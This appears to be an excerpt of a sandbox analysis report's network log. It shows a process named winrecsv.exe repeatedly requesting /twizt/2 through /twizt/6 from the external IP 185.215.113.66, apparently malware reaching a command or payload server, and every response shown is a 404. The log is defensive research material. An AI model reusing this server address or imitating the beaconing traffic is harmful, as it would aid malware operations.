                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:43.014853001 CEST873OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:43.071795940 CEST874INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:44.812818050 CEST874OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:44.871459961 CEST876INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                10192.168.2.749804185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:36.809062958 CEST7061OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:36.866003036 CEST7062INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:36 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:37.938834906 CEST7062OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:38.000555992 CEST7063INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:39.964112043 CEST7105OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:40.021171093 CEST7106INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:41.314265013 CEST7106OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:41.375215054 CEST7107INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:43.473820925 CEST7107OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:43.869448900 CEST7115OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:43.928890944 CEST7115INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                11192.168.2.749821185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:47.189857006 CEST7267OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:47.251492977 CEST7268INHTTP/1.1 404 Not Found
